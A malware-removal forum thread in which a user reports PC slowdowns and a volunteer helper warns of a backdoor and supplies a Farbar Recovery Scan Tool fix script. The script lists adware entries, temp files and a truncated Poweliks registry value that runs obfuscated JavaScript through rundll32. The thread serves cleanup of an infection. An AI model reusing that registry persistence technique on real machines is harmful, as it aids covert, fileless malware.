Jump to content

Build Theme!
  •  
  • Infected?

WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. :D Join 92789 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!


Photo

I may be infected with Malware, can you help? [Closed]


  • This topic is locked This topic is locked
21 replies to this topic

#1 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 30 November 2014 - 05:30 PM

I fear I've come down with a case of Malware.  Can you please review and advise?  I have been experiencing periods of extreme slowness on my PC while trying to do very basic actions.  Norton360 has been alerting on high CPU usage of the following:  COM surrogate, wextract.exe, dplaysvr. Looking at Task Manager and Resource Monitor I've found high CPU usage of svchost and multiple sessions of dllhost.  I am also getting alerts from Norton of threats that have been found, and Norton has been recommending frequent restarts.  I am also getting frequent messages stating:  Powershell has stopped working.  I was not knowingly running any scripts using Powershell. 

 

At this moment, with nothing but Notepad open as I type this up ahead of time (before posting) and Task Manager running, CPU is jumping up and down between 50% to 100%.  I know that there are alot of processes running the background but this seems extreme to me.  After disconnecting my internet, the CPU usage dropped to between 5% and 15% within around 10 seconds.  I have run aswMBR and FRST64 and have logs ready to upload.  Thank you!

Attached Files


Edited by suefiza, 30 November 2014 - 05:32 PM.

    Advertisements

Register to Remove


#2 LiquidTension

LiquidTension

    SuperMember

  • Retired Classroom Teacher
  • 2,566 posts

Posted 30 November 2014 - 09:02 PM

Hello suefiza, welcome to WhatTheTech's Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that.  :)
 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Please ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not post logs using the CODEQUOTE or ATTACHMENT format. Logs should be posted directly in plain text. If you receive an error whilst posting, please break the log in half and use multiple posts.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in ascertaining the current situation and providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable.  
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • Ensure you are following this topic. Click etYzdbu.png at the top of the page. 
     

======================================================
 
Due to the nature of the infection present, I must issue the following warning. Please have a read and let me know what you think. 
 

goGMWSt.gifBACKDOOR WARNING
 
------------------------------
 
One or more of the identified infections is known to use a backdoor, that allows attackers to remotely control your computer, download/execute files and steal critical system, financial and personal information.
 
If your computer was used for online banking, has credit card information or other sensitive data, using a non-infected computer/device you should immediately change all account information (including those used for banking, Email, eBay, Paypal, online forums, etc).
 
Banking and credit card institutions should be notified of the possible security breach. Please read the following article for more information: How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
 
Whilst the identified infection(s) can be removed, there is no way to guarantee the trustworthiness of your computer unless you reformat your Hard Drive and reinstall your Operating System. This is due to the nature of the infection, which allows a remote attacker to make any number of modifications. Many experts in the security community believe that once infected with this type of malware, the best course of action is to reformat/reinstall. Please read the following articles for more information.

You now have the choice between cleaning the infection(s) present or reformatting your computer. Ultimately, the decision is personal, and what you're most comfortable please. Have a read of the articles linked, then let me know how you wish to proceed, and if you have any questions.

 
If you wish to clean the machine now, please work your way through the steps below. 
 
STEP 1
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-708974729-55146766-922195683-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    URLSearchHook: HKU\S-1-5-21-708974729-55146766-922195683-1000 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
    SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> DefaultScope {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmoods.com/results.php?f=4&a=axl&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmoods.com/results.php?f=4&a=axl&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {A531D99C-5A22-449b-83DA-872725C6D0ED} URL = http://search.alot.com/web?q={searchTerms}&pr=prov&client_id=85E670F001CD139105B8FB4C&install_time=2012-04-06T01:06:33Z&src_id=30504&camp_id=3906&tb_version=1.1.3001.0(B)
    BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
    Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
    FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
    CHR HomePage: Default -> hxxp://start.funmoods.com/?f=1&a=axl
    CHR HKLM-x32\...\Chrome\Extension: [fdloijijlkoblmigdofommgnheckmaki] - C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx [2014-10-04]
    C:\Program Files (x86)\Funmoods
    2014-11-30 15:17 - 2014-11-30 15:17 - 00000000 ____D () C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}
    2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00023117.tmp
    2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00015471.tmp
    2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00031111.tmp
    2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00028728.tmp
    2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00026393.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00031371.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020726.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020389.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00017818.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00031411.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00029171.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00025329.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00017058.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00014895.tmp
    2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00011232.tmp
    2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00002098.tmp
    2014-11-29 11:21 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00032327.tmp
    2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00032523.tmp
    2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00014946.tmp
    2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00010308.tmp
    2014-11-29 11:20 - 2014-11-29 11:20 - 01176168 ____T () C:\windows\SysWOW64\00003015.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 40034920 ____T () C:\windows\SysWOW64\00002113.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023823.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023071.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00014825.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010889.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010756.tmp
    2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00018636.tmp
    2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00009161.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030454.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030447.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028745.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028716.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026816.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026777.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00024578.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023986.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023973.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00016512.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015573.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015155.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00005021.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00002866.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00031673.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00030319.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00024078.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00023996.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00010089.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00009930.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00002306.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00031115.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00029658.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00025608.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00024626.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00023762.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00022929.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00021311.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016541.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016118.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014977.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014643.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00012646.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00010697.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002161.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002082.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00032439.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031960.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031865.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00026308.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00025184.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00023329.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00016944.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00011840.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00004966.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00002237.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00031322.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00023811.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00031705.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030925.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030333.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029577.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029464.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00028973.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00026798.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025951.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025547.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025444.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024393.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024370.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024084.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023805.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023491.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00020799.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017673.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017555.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00016571.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015890.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015350.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015141.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015006.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014883.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014818.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012859.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012623.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010496.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010309.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010053.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00009413.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00003548.tmp
    2014-11-28 19:03 - 2014-11-28 19:03 - 40034920 ____T () C:\windows\SysWOW64\00015984.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00026299.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00017035.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00011277.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00009894.tmp
    2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00025667.tmp
    2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00017619.tmp
    2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00015674.tmp
    2014-11-28 18:49 - 2014-11-28 18:49 - 40034920 ____T () C:\windows\SysWOW64\00009558.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00029666.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00020219.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032474.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032274.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031833.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031762.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00030039.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00028825.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020776.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020697.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020695.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00017098.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016156.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016039.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016021.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015665.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015633.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00011924.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00008712.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00003225.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030809.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030106.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00024466.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00023278.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00015279.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00009040.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00008942.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00001842.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00030623.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00018317.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00012316.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00003035.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00032391.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00029358.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00025850.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00024464.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00023281.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00021293.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00017421.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00015724.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00014771.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012382.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012296.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011942.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011811.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011478.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00009741.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00008723.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00002995.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00001869.tmp
    2014-11-28 17:41 - 2014-11-28 17:41 - 40034920 ____T () C:\windows\SysWOW64\00026500.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00018266.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00016034.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00015634.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00002285.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030578.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030229.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00023977.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020742.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020235.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00010628.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00009513.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00030861.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00026229.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00024618.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00015427.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011764.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011583.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011416.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00009629.tmp
    2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00024044.tmp
    2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00010878.tmp
    2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00004843.tmp
    2014-11-21 19:24 - 2014-11-21 19:24 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\UpdaterEX
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00032443.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00029794.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00023882.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00020540.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00016943.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00008696.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00032387.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030762.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030524.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030400.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029911.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029532.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029136.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00026392.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00025130.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00024350.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00020723.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018485.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018399.tmp
